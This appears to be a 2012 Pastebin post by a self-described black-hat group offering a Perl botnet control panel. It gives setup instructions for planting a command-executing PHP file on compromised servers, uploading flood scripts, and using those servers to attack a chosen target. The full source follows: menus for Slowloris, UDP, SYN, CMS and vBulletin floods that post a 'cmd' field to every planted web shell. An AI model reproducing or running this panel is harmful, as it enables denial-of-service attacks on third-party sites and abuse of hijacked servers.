Advertisement
G3n3Rall

BHG BOTNET Public Version PANEL

May 19th, 2012
637
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 12.48 KB | None | 0 0
  1. Hi Guys
  2. BHG-BOTNET-Public-Version-PANEL
  3.  
  4.  
  5.  
  6.  
  7. Download Forum Here
  8. http://g3n3rall-blackhat.persiangig.com/Pastebin/BHG-BOTNET-Public-Version-PANEL.tar.gz
  9.  
  10. support:
  11.  
  12.          1- Slowloris [Good For Apache webservers]
  13.          2- UDP ULTIMATE DDOSER
  14.          3- Multi DDOSER [WORDPRESS - JOOMLA - DRUPAL]
  15.          4- VBulletin DDOSER [ULTIMATE]
  16.          5- Syn Flooder
  17.  
  18.  
  19. Picture:
  20. http://g3n3rall-blackhat.persiangig.com/Pastebin/Screenshot%20from%202012-05-19%2020%3A39%3A21.png
  21.  
  22. Help:
  23. 1- upload BHG.php on your servers
  24. 2- put the links in to BOTS.txt    
  25. example:
  26. http://site1.com/BHG.php
  27. http://site2.com/BHG.php
  28. 3-upload ddosers [multi-ddoser.pl || slowloris.pl || syn-flooder.pl || udp-flooder-ultimate.pl ||vbulletin-ddoser.pl ]
  29. on yout servers and Set 777 Permission for all
  30. 4- Run BHG-BOTNET-PANEL.pl  and select your DDoser or Flooder And You Can also
  31. check your Bots and then Enter Target And attack :)
  32.  
  33. Private Version 100% is better than it ! :D And it's just for
  34. VIP Memebers of BLACK HAT GROUP ;)
  35. and i put panel source if you wont download from that link :
  36.  
  37. Panel Source :
  38. #!/usr/bin/perl
  39. #BHG BOTNET PANEL VERION BETA
  40. #BLACK HAT GROUP SECURITY CENTER
  41. #Code By G3n3Rall
  42. #AnTi.SecurityBoy@Gmail.com
  43. #We Are : Net.Edit0r , A.Crox , 3H34N , Am!n , tHe.K!ll3r , ArYaIeIrAn , G3n3Rall , Mr.XHat , NoL1m1t , Black Viper ,Nitrojen90 .....
  44. #www.Black-HG.Org   | Our Forum : www.Black-HG.Org/cc/
  45. #IRANIAN HACKERS
  46. ################
  47. use WWW::Mechanize;
  48. use LWP::Simple;
  49. use HTTP::Request;
  50. use LWP::UserAgent;
  51. ################
  52. system(($^O eq 'MSWin32') ? 'cls' : 'clear');   #or u can use  system("cls");  in windows and in linux system("clear");
  53. print"\n \t \t $BHG BOTNET PANEL VERSION BETA    |   G3n3Rall";
  54. print"\n \t\t  BLACK-HG.ORG    |Forum:  BLACK-HG.ORG/cc/ ";
  55. print "\n\n\n \t\t\t Choose Your DDoser :\n";
  56. print "\n\n \t\t 1- Slowloris [Good For Apache webservers]";
  57. print "\n \t\t 2- UDP ULTIMATE DDOSER";
  58. print "\n \t\t 3- Multi DDOSER [WORDPRESS - JOOMLA - DRUPAL]";
  59. print "\n \t\t 4- VBulletin DDOSER [ULTIMATE]";
  60. print "\n \t\t 5- Syn Flooder";
  61. print "\n\n \t\t 6- Exit ";
  62. print "\n\n \t Chosse ?:";
  63. #############
  64. $Menu =<STDIN>;
  65. if ($Menu==6) {exit;}
  66. chomp ($Menu);
  67. #############
  68. #Slowloris.pl
  69. if ($Menu == 1){
  70. print "\n\t\t You Choose Slowloris \n";
  71. print "\n\n\t\t PROGRESSING ....";
  72. print"\n";
  73. print"\n";
  74. sleep(3);
  75. ForCheck:;
  76. print "\n\n \t\t Do want check your BOTS ?";
  77. print "\n\n\n \t\t 1- YES";
  78. print "\n \t\t 2- NO";
  79. print "\n \t\t Check ?:";
  80. $check=<STDIN>;
  81. chomp ($check);
  82. if ($check == 2){
  83. print " \n \t \t ok ";
  84. goto Target;
  85. }
  86. if ($check == 1) {
  87. print " \n \t\t Checking .... \n";
  88. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  89. while (<BTS>){
  90.         $BOTS=$_;
  91.         chomp $BOTS;
  92.         syswrite STDOUT, "\t";
  93.         $request = HTTP::Request->new(GET=>$BOTS);
  94.         $useragent = LWP::UserAgent->new();
  95.         $response = $useragent->request($request);
  96.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  97.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  98.        
  99.         }
  100.         else
  101.         {
  102.         syswrite STDOUT, "$BOTS => KILLED\n";
  103.         sleep(2);
  104.         exit;
  105.         }
  106.         }
  107.         goto Target;
  108. }
  109. Target:;
  110. print "\n \t LOADING ...\n ";
  111. print "\n";
  112. sleep (3);
  113. print "\t Enter Target:";
  114. $Target=<STDIN>;
  115. chomp ($Target);
  116. print "\n\t Enter Port:";
  117. $Port =<STDIN>;
  118. chomp ($Port);
  119. print "\n\t Timeout:";
  120. $Timeout = <STDIN>;
  121. $cmd = "perl slowloris.pl -dns $Target -port $Port -timeout $Timeout";
  122. $fieldname = "cmd";
  123. goto ddos;
  124. #############
  125. ddos:;
  126. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  127. while (<BOTS>) {
  128. $ATTACK=$_;
  129. chomp $ATTACK;
  130. syswrite STDOUT, "\n\t Connecting ...\n";
  131. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  132. $mechanizee->get($ATTACK);
  133. $mechanizee->field("$fieldname" => "$cmd");
  134. $mechanizee->click();
  135. print "\n\t################\n";
  136. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  137. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  138. print "\n \t\t .............................\n";
  139. print "\n \t\t .............................\n";
  140. print "\n \t\t .............................\n";
  141. }
  142. print"\n";
  143. sleep ($Timeout);
  144. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  145.  
  146. }
  147.  
  148.  
  149.  
  150. #############
  151. #ultimate-ddoser.pl
  152. if ($Menu == 2){
  153. print "\n\t\t You Choose UDP ULTIMATE DDOSER \n";
  154. print "\n\n\t\t PROGRESSING ....";
  155. print"\n";
  156. print"\n";
  157. sleep(3);
  158. ForCheck:;
  159. print "\n\n \t\t Do want check your BOTS ?";
  160. print "\n\n\n \t\t 1- YES";
  161. print "\n \t\t 2- NO";
  162. print "\n \t\t Check ?:";
  163. $check=<STDIN>;
  164. chomp ($check);
  165. if ($check == 2){
  166. print " \n \t \t ok ";
  167. goto Target2;
  168. }
  169. if ($check == 1) {
  170. print " \n \t\t Checking .... \n";
  171. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  172. while (<BTS>){
  173.         $BOTS=$_;
  174.         chomp $BOTS;
  175.         syswrite STDOUT, "\t";
  176.         $request = HTTP::Request->new(GET=>$BOTS);
  177.         $useragent = LWP::UserAgent->new();
  178.         $response = $useragent->request($request);
  179.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  180.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  181.         goto Target2;
  182.         }
  183.         else
  184.         {
  185.         syswrite STDOUT, "$BOTS => KILLED\n";
  186.         sleep(2);
  187.         exit;
  188.         }
  189.         }
  190. }
  191. Target2:;
  192. print "\n \t LOADING ...\n ";
  193. print "\n";
  194. sleep (3);
  195. print "\t Enter Target:";
  196. $Target=<STDIN>;
  197. chomp ($Target);
  198. print "\n\t Enter Port:";
  199. $Port =<STDIN>;
  200. chomp ($Port);
  201. $cmd = "perl udp-flooder-ultimate.pl $Target $Port";
  202. $fieldname = "cmd";
  203. goto ddos2;
  204. #############
  205. ddos2:;
  206. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  207. while (<BOTS>) {
  208. $ATTACK=$_;
  209. chomp $ATTACK;
  210. syswrite STDOUT, "\n\t Connecting ...\n";
  211. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  212. $mechanizee->get($ATTACK);
  213. $mechanizee->field("$fieldname" => "$cmd");
  214. $mechanizee->click();
  215. print "\n\t################\n";
  216. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  217. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  218. print "\n \t\t .............................\n";
  219. print "\n \t\t .............................\n";
  220. print "\n \t\t .............................\n";
  221. }
  222. print"\n";
  223. sleep (999999999999999999999999999999999999999999999999999999999999999999999999999999);
  224. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  225.  
  226. }
  227. ##############
  228. #multi-ddoser.pl
  229. if ($Menu == 3){
  230. print "\n\t\t You Choose MULTI DDOSER \n";
  231. print "\n\n\t\t PROGRESSING ....";
  232. print"\n";
  233. print"\n";
  234. sleep(3);
  235. ForCheck:;
  236. print "\n\n \t\t Do want check your BOTS ?";
  237. print "\n\n\n \t\t 1- YES";
  238. print "\n \t\t 2- NO";
  239. print "\n \t\t Check ?:";
  240. $check=<STDIN>;
  241. chomp ($check);
  242. if ($check == 2){
  243. print " \n \t \t ok ";
  244. goto Target3;
  245. }
  246. if ($check == 1) {
  247. print " \n \t\t Checking .... \n";
  248. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  249. while (<BTS>){
  250.         $BOTS=$_;
  251.         chomp $BOTS;
  252.         syswrite STDOUT, "\t";
  253.         $request = HTTP::Request->new(GET=>$BOTS);
  254.         $useragent = LWP::UserAgent->new();
  255.         $response = $useragent->request($request);
  256.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  257.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  258.         goto Target3;
  259.         }
  260.         else
  261.         {
  262.         syswrite STDOUT, "$BOTS => KILLED\n";
  263.         sleep(2);
  264.         exit;
  265.         }
  266.         }
  267. }
  268. Target3:;
  269. print "\n \t LOADING ...\n ";
  270. print "\n";
  271. sleep (3);
  272. print "\t Enter Target:";
  273. $Target=<STDIN>;
  274. chomp ($Target);
  275. print "\n\tTimeout:";
  276. $Timeout =<STDIN>;
  277. print "\n\n \t Select Options: W = WordPress |  J = Joomla  |  D = Drupal";
  278. print "Options:";
  279. $Options=<STDIN>;
  280. $cmd = "perl multi-ddoser.pl $Target $Timeout $Options";
  281. $fieldname = "cmd";
  282. goto ddos3;
  283. #############
  284. ddos3:;
  285. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  286. while (<BOTS>) {
  287. $ATTACK=$_;
  288. chomp $ATTACK;
  289. syswrite STDOUT, "\n\t Connecting ...\n";
  290. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  291. $mechanizee->get($ATTACK);
  292. $mechanizee->field("$fieldname" => "$cmd");
  293. $mechanizee->click();
  294. print "\n\t################\n";
  295. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  296. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  297. print "\n \t\t .............................\n";
  298. print "\n \t\t .............................\n";
  299. print "\n \t\t .............................\n";
  300. }
  301. print"\n";
  302. sleep ($Timeout);
  303. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  304.  
  305. }
  306. ##############
  307. #vbulletin-ddoser.pl
  308. #multi-ddoser.pl
  309. if ($Menu == 4){
  310. print "\n\t\t You Choose VBulletin DDOSER [ULTIMATE] \n";
  311. print "\n\n\t\t PROGRESSING ....";
  312. print"\n";
  313. print"\n";
  314. sleep(3);
  315. ForCheck:;
  316. print "\n\n \t\t Do want check your BOTS ?";
  317. print "\n\n\n \t\t 1- YES";
  318. print "\n \t\t 2- NO";
  319. print "\n \t\t Check ?:";
  320. $check=<STDIN>;
  321. chomp ($check);
  322. if ($check == 2){
  323. print " \n \t \t ok ";
  324. goto Target4;
  325. }
  326. if ($check == 1) {
  327. print " \n \t\t Checking .... \n";
  328. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  329. while (<BTS>){
  330.         $BOTS=$_;
  331.         chomp $BOTS;
  332.         syswrite STDOUT, "\t";
  333.         $request = HTTP::Request->new(GET=>$BOTS);
  334.         $useragent = LWP::UserAgent->new();
  335.         $response = $useragent->request($request);
  336.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  337.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  338.         goto Target4;
  339.         }
  340.         else
  341.         {
  342.         syswrite STDOUT, "$BOTS => KILLED\n";
  343.         sleep(2);
  344.         exit;
  345.         }
  346.         }
  347. }
  348. Target4:;
  349. print "\n \t LOADING ...\n ";
  350. print "\n";
  351. sleep (3);
  352. print "\t Enter Target:";
  353. $Target=<STDIN>;
  354. chomp ($Target);
  355. print "Forum Path [ example /forum/   or  /:";
  356. $Path=<STDIN>;
  357. $cmd = "perl vbulletin-ddoser.pl $Target $Path";
  358. $fieldname = "cmd";
  359. goto ddos4;
  360. #############
  361. ddos4:;
  362. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  363. while (<BOTS>) {
  364. $ATTACK=$_;
  365. chomp $ATTACK;
  366. syswrite STDOUT, "\n\t Connecting ...\n";
  367. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  368. $mechanizee->get($ATTACK);
  369. $mechanizee->field("$fieldname" => "$cmd");
  370. $mechanizee->click();
  371. print "\n\t################\n";
  372. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  373. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  374. print "\n \t\t .............................\n";
  375. print "\n \t\t .............................\n";
  376. print "\n \t\t .............................\n";
  377. }
  378. print"\n";
  379. sleep (999999999999999999999999999999999999999999999999999999999999999999999999999999);
  380. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  381.  
  382. }
  383. ##############
  384. #syn-flooder.pl
  385. if ($Menu == 5){
  386. print "\n\t\t You Choose Syn Flooder \n";
  387. print "\n\n\t\t PROGRESSING ....";
  388. print"\n";
  389. print"\n";
  390. sleep(3);
  391. ForCheck:;
  392. print "\n\n \t\t Do want check your BOTS ?";
  393. print "\n\n\n \t\t 1- YES";
  394. print "\n \t\t 2- NO";
  395. print "\n \t\t Check ?:";
  396. $check=<STDIN>;
  397. chomp ($check);
  398. if ($check == 2){
  399. print " \n \t \t ok ";
  400. goto Target5;
  401. }
  402. if ($check == 1) {
  403. print " \n \t\t Checking .... \n";
  404. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  405. while (<BTS>){
  406.         $BOTS=$_;
  407.         chomp $BOTS;
  408.         syswrite STDOUT, "\t";
  409.         $request = HTTP::Request->new(GET=>$BOTS);
  410.         $useragent = LWP::UserAgent->new();
  411.         $response = $useragent->request($request);
  412.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  413.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  414.         goto Target5;
  415.         }
  416.         else
  417.         {
  418.         syswrite STDOUT, "$BOTS => KILLED\n";
  419.         sleep(2);
  420.         exit;
  421.         }
  422.         }
  423. }
  424. Target5:;
  425. print "\n \t LOADING ...\n ";
  426. print "\n";
  427. sleep (3);
  428. print "\t Enter Target:";
  429. $Target=<STDIN>;
  430. chomp ($Target);
  431. print "\n\t Enter Port:";
  432. $Port =<STDIN>;
  433. chomp ($Port);
  434. print "\n\t Timeout:";
  435. $Timeout = <STDIN>;
  436. $cmd = "perl syn-flooder.pl $Target $Port $Timeout";
  437. $fieldname = "cmd";
  438. goto ddos5;
  439. #############
  440. ddos5:;
  441. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  442. while (<BOTS>) {
  443. $ATTACK=$_;
  444. chomp $ATTACK;
  445. syswrite STDOUT, "\n\t Connecting ...\n";
  446. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  447. $mechanizee->get($ATTACK);
  448. $mechanizee->field("$fieldname" => "$cmd");
  449. $mechanizee->click();
  450. print "\n\t################\n";
  451. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  452. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  453. print "\n \t\t .............................\n";
  454. print "\n \t\t .............................\n";
  455. print "\n \t\t .............................\n";
  456. }
  457. print"\n";
  458. sleep ($Timeout);
  459. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  460.  
  461. }
  462. ##############
  463. if ($Menu =! 1 || $Menu =! 2 || $Menu =! 3 || $Menu =! 4 || $Menu=! 5 || $Menu=! 6){
  464. print "\n \t\t invalid id";
  465. goto ForCheck;
  466. }
  467. system("pause");
  468. ############################################
  469. ############################################
  470.  
  471.  
  472.  
  473.  
  474.  
  475. Black Hat group Security Center
  476. Site: www.Black-hg.org
  477. Forum: www.Black-hg.org/cc/
  478. By G3n3Rall
  479. AnTi.SecurityBoy@Gmail.com
  480.  
  481. Bye.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement